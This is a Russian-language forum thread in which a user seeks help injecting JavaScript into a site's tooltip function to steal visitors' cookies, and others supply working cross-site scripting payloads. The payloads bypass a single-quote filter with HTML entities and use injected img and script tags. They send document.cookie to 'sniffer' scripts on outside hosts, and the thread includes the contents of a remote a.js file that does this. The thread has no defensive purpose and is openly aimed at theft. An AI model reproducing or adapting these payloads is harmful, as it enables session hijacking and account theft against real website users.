PDA

Просмотр полной версии : Проблема в JavaScripts... Возможно ли такое?

FoGorm
05.01.2006, 01:53
Есть такая функция вывода текста:
function show(text) {
var s;
s='<FONT STYLE="FONT-SIZE: 8pt;">'+text+'</FONT>';
hint1.innerHTML=s;
SetPosition();
hint1.style.visibility='visible';
}

Она выводит на экран текст таким образом
onmouseover="show('ТЕКСТ');"

Помогите пожалуйста, можно ли вставить в show('СЮДА') еще одну ява функцию (например: alert(document.cookie);) если не розрешается использовать символ " ' " (одинарной кавычки), он заменяется на ‘ Также розрешается использовать любые символы вида &quot; , &amp; , &lt; и т.к.
P.S. Если допускалось использование одинарной кавчки, я бы сделал так
onmouseover="show('ТЕКСТ');alert(document.cookie);('');", т.е. просто бы вставил ');alert(document.cookie);('

Но увы так нельзя... поэтому пришлось обращаться к вам за помощью :(
FoGorm
05.01.2006, 02:40
Уже нашел одно из решений, но всерано не могу добиться главного:
Вот такое проходит: </script><img src=javascript:alert(document.cookie);><script>
Но мне нужно чтобы кукисы не выводились а отправлялись на сниффер. Написал вот так вот:
</script><img src=javascript:document.images[0].src=http://adress/sniff.php?+document.cookie;><script>
Но выводит синтаскичискую ошибку... помогите розобраться, напомнаю использовать " ' " (одинарную кавычку) нельзя :(
FoGorm
05.01.2006, 23:34
хана.. что за форум.. одно молчание :(
Abra
05.01.2006, 23:47
src="http://adress/sniff.php?"+document.cookie;>
так попробуй. Двойные ковычки то использывать можно?
Algol
05.01.2006, 23:58
Масса способов.
Например
</script><img src=javascript:document.images[0].src=&quot;http://adress/sniff.php?+document.cookie;&quot;><script>

А вообще см. http://antichat.ru/crackchat/HTML/
Там все есть.
FoGorm
06.01.2006, 00:01
думаю двойные кавчки здесь не выход.. т.к. елси поставить двойную кавычку, то она закроет onmouseover=" вот эту.. но этого делать нельзя(
FoGorm
06.01.2006, 00:23
&lt;/script&gt;&lt;img src=javascript:document.images[0].src=&quot;http://saittt.ru/s.php?i=&quot;+document.cookie;&gt;&lt;script&gt;

В итогде это все работает, но там стоит ограничение на кол-во символов.. так что если возможно.. то нужно сделать длинной не больше чем &lt;/script&gt;&lt;img src=javascript:document.images[0].src=&quot;http://saittt.ru/s.php?i=&quot;+... вот посюда оно его обрезает.. последний штрих :)
Algol
06.01.2006, 00:27
</script><script src=http://blablabla.ru/a.js></script>
FoGorm
06.01.2006, 00:33
Если можешь, напиши содержимое .js файла.. а то я плохо в яве розбираюсь, но то что ты предложил понял, и мне это видимо подходит...
Algol
06.01.2006, 00:40
a.js :
i = new Image();
i.src="http://mysite.ru/sniff.pl?"+document.cookie;
FoGorm
06.01.2006, 00:51
Странно.. сделал ссылку.. но ничего не выводит... даж картинки не видно...
Algol
06.01.2006, 00:55
А оно ничего и не должно выводить. Оно на сниф куки отсылает.